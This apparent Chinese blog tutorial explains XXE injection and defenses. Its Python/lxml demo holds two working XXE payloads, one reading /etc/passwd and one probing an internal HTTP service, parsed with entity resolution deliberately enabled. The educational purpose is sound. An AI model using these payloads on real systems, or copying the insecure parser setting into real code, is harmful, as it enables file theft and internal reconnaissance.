利用 XML 外部实体注入(XXE)读取文件和探测内部网络

Bruce_Liuxiaowei2025-05-25 8:16

利用 XML 外部实体注入(XXE)读取文件和探测内部网络

引言

XML 外部实体注入(XXE)是一种常见的安全漏洞,攻击者可以通过这种漏洞读取服务器上的文件或探测内部网络。本文将通过一个实际的 Python 代码示例,展示如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

什么是 XXE?

XML 外部实体注入(XXE)是指在解析 XML 数据时,如果 XML 解析器启用了外部实体解析功能,攻击者可以注入恶意的 XML 实体来访问服务器上的敏感文件或发起网络请求。这种漏洞通常出现在使用 XML 解析库的应用程序中,特别是在未正确配置解析器的情况下。

代码示例

以下是一个 Python 代码示例,展示了如何利用 XXE 漏洞读取 /etc/passwd 文件并探测本地运行的 HTTP 服务器。

python 复制代码 
from lxml import etree
import requests

# XML payload to read /etc/passwd
x = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

# XML payload to probe internal network (e.g., 127.0.0.1)
x1 = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://127.0.0.1:8000" >]>
<methodcall>
  <methodname>&xxe;</methodname>
</methodcall>
"""

def parse_xml(xml_bytes):
    try:
        # Parse the XML bytes with lxml, which supports external entities
        parser = etree.XMLParser(resolve_entities=True)
        root = etree.fromstring(xml_bytes, parser=parser)
        methodname = root.find('methodname').text
        print(methodname)
    except Exception as e:
        print(f"Error: {e}")

# Parse the first XML string
parse_xml(x)

# Parse the second XML string
parse_xml(x1)

代码解析

  1. XML Payload:

    • xx1 是两个字节字符串,分别包含外部实体 &xxe;
    • x 中的外部实体指向 /etc/passwd 文件。
    • x1 中的外部实体指向 http://127.0.0.1:8000

  2. 解析函数:

    • parse_xml 函数使用 lxml.etree.fromstring 解析字节字符串,并打印 <methodname> 元素的内容。
    • etree.XMLParser(resolve_entities=True) 参数启用外部实体解析。

  3. 解析 XML 字符串:

    • 调用 parse_xml(x) 解析第一个 XML 字节字符串,读取 /etc/passwd 文件内容。
    • 调用 parse_xml(x1) 解析第二个 XML 字节字符串,探测 http://127.0.0.1:8000 的内容。

运行结果

当运行上述代码时,如果成功读取到 /etc/passwd 文件,将会输出文件内容。如果成功探测到 http://127.0.0.1:8000,将会输出该 URL 的响应内容。

如何防御 XXE 漏洞

为了防止 XXE 漏洞,可以采取以下措施:

  1. 禁用外部实体解析 :在解析 XML 时,禁用外部实体解析功能。例如,在 lxml 中,可以使用 etree.XMLParser(resolve_entities=False)
  2. 使用安全的 XML 解析库:选择那些默认不解析外部实体的库。
  3. 输入验证:对用户输入进行严格的验证,确保输入的数据符合预期格式。
  4. 定期更新和打补丁:保持系统和库的最新状态,及时应用安全补丁。

结论

通过上述示例,我们可以看到 XXE 漏洞的潜在危害。了解这些漏洞并采取适当的防御措施对于保护应用程序的安全至关重要。希望本文能够帮助读者更好地理解 XXE 漏洞及其防范方法。

相关推荐
looking_for__6 小时前
【Linux】应用层协议
linux·服务器·网络
以太浮标7 小时前
华为eNSP模拟器综合实验之- VLAN终结实践案例分析
网络·计算机网络·华为·智能路由器
Trouvaille ~9 小时前
【Linux】网络编程基础(二):数据封装与网络传输流程
linux·运维·服务器·网络·c++·tcp/ip·通信
柱子jason9 小时前
使用IOT-Tree Server模拟Modbus设备对接西门子PLC S7-200
网络·物联网·自动化·modbus·西门子plc·iot-tree·协议转换
csdn2015_9 小时前
generatorConfig.xml 配置 Controller、Service 完整教程
xml·mybatis
Arvin62711 小时前
研发环境:SSL证书快速部署
网络·网络协议·ssl
Trouvaille ~11 小时前
【Linux】网络编程基础(三):Socket编程预备知识
linux·运维·服务器·网络·c++·socket·网络字节序
酣大智11 小时前
DHCP中继配置实验
运维·网络·网络协议·tcp/ip·华为
小义_11 小时前
【RH134知识点问答题】第6章 管理 SELinux 安全性
linux·网络·云原生·rhel
REDcker12 小时前
RTSP 直播技术详解
linux·服务器·网络·音视频·实时音视频·直播·rtsp
热门推荐
01GitHub 镜像站点02一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示03Claude Code Skills 实用使用手册04Vue-skills的中文文档05OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)06UV安装并设置国内源07在Trae中使用Pencil MCP082025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望09Clawdbot 中文汉化版 接入微信、飞书10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services